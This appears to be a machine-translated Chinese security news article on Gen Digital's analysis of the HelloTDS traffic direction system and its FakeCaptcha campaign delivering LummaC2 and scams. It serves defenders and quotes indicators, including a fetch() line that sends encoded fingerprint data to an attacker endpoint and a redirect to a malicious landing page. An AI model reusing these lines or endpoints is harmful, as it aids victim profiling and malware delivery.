最近几个月,新一波复杂的恶意软件活动席卷了全球数百万台设备,这得益于一个名为HelloTDS的难以捉摸的基础设施及其标志性策略FakeCaptcha。

该活动将社会工程和技术诡计巧妙地融合在一起,使威胁行为者能够在众多地区破坏系统,针对毫无戒心的用户,因为他们消费流媒体,下载共享文件,甚至浏览合法出现的网站。

根据Gen Digital(Gen)的分析师的说法,HelloTDS背后的策划者已经策划了一个全球感染网络,整个2025年4月和5月的检测结果急剧飙升。

Gendigital研究人员首先将HelloTDS确定为一个复杂的交通方向系统(TDS) – 一种恶意决策引擎,利用设备和网络指纹识别来选择哪些访问者收到有害有效载荷,从LummaC2等信息窃取器到欺诈性浏览器更新和技术支持骗局。

威胁的入口点包括受损或攻击者操作的文件共享门户(特别是每日上传[.]net和Streamtape[.]net),流媒体网站,色情平台,甚至嵌入在看似无害的广告点中的恶意广告。

该系统的过滤和重定向逻辑使其能够避免明显的蜜罐,如虚拟机,VPN或已知的分析环境,显着复杂化检测和删除工作。

这场运动的规模是惊人的。Gen的遥测报告在短短两个月内发生了超过430万例感染,其影响最大的是美国,巴西,印度,西欧以及几个巴尔干和非洲国家。

通过利用快速域旋转,加密通信和旨在模仿合法服务的假CAPTCHA,攻击者最大限度地发挥其覆盖范围和逃避自动化安全解决方案的能力。

感染链通常从用户访问受感染的网站或点击诱杀下载链接时开始。用户不知道,网站从HelloTDS端点加载远程托管的JavaScript片段,触发多阶段指纹和重定向序列。

Gendigital分析师观察到,受害者根据地理位置,浏览器特征和行为线索进行实时评估;只有当用户被视为“高价值”时,用户才会流向活动恶意软件。

感染机制:技术深潜

HelloTDS的核心是一个精心设计的多级感染过程,专为精度和隐身而设计。

当潜在受害者访问一个入口点网站时(通常是在上传或下载文件之后),页面会隐形地嵌入一个脚本。

此脚本启动服务器端网络和设备指纹识别例程。HelloTDS的后端决定,使用诸如IP声誉,地理位置和虚拟环境指标等因素,是否为有效载荷服务或返回良性,惰性脚本(通常是空白函数或无害评论,如// ipx。

如果访问者被标记为可行目标,服务器会以严重混淆的 JavaScript 文件作为响应,包括“加密”的配置有效载荷。

一个独特的指标是使用自定义HTTP标头的HelloTDS(megageocheckolololo) 在Access-Control-Allow-Headers用于选择性过滤,以及蓝色团队狩猎TDS基础设施的标志:

Access-Control-Allow-Headers: content-type, megageocheckolololo, x-forwarded-for, x-requested-with, ...

该脚本一旦在浏览器中执行,就会进行广泛的指纹识别,收集设备硬件规格、浏览器编解码器、屏幕方向、活动内存、用户交互模式等数据。

然后对收集的数据进行编码(Base64和Zlib压缩),并作为动态生成的URL的一部分传输到次要的HelloTDS端点:

fetch("https://bu.unrimedironize.shop/cx/6Ae...n2Q?md=[mdglh]&pr=...&fc=...")

嵌入式JSON配置的解密显示了各种键,包括用于跟踪、错误报告和最终重定向(“rot_url”)的进一步URL。

如果服务器的风险矩阵继续为访问者开绿灯,则浏览器将被强制重定向到恶意软件交付或诈骗页面,通常伪装成虚假的CAPTCHA或虚假软件更新。

最终有效载荷的典型重定向着陆页看起来像这样:

    location.href = 'hxxps://bestfree4u[.]com/?sub1=...&sub4={browser}&sub5={os}&sub6={country}';

这种积极、适应性强的方法不会以感染而告终。基础设施动态地提供良性或恶意内容,具体取决于访问者的属性 – 代理背后的研究人员和用户通常显示无害的诱饵,而普通用户会收到强大的恶意软件,例如LummaC2的加载器或受害者粘贴到Windows Run对话框的命令。

FakeCaptchaGen的详细分析强调了FakeCaptcha和HelloTDS构成的威胁:一个自我进化的低摩擦感染基础设施,利用技术漏洞和人为因素。

随着 HelloTDS 背后的参与者不断创新,安全团队有责任改进他们的检测方法,利用这些法医细节和独特的签名来阻止未来的攻击。

对于网络安全专业人员来说,识别 multi-layered infection chainHelloTDS 高度针对性、多层感染链势在必行。

通过了解其进入向量,自适应过滤和重定向机制,防御者可以加强其网络边界,部署更有效的行为分析,并在这些恶意活动危及其他用户之前破坏这些恶意活动。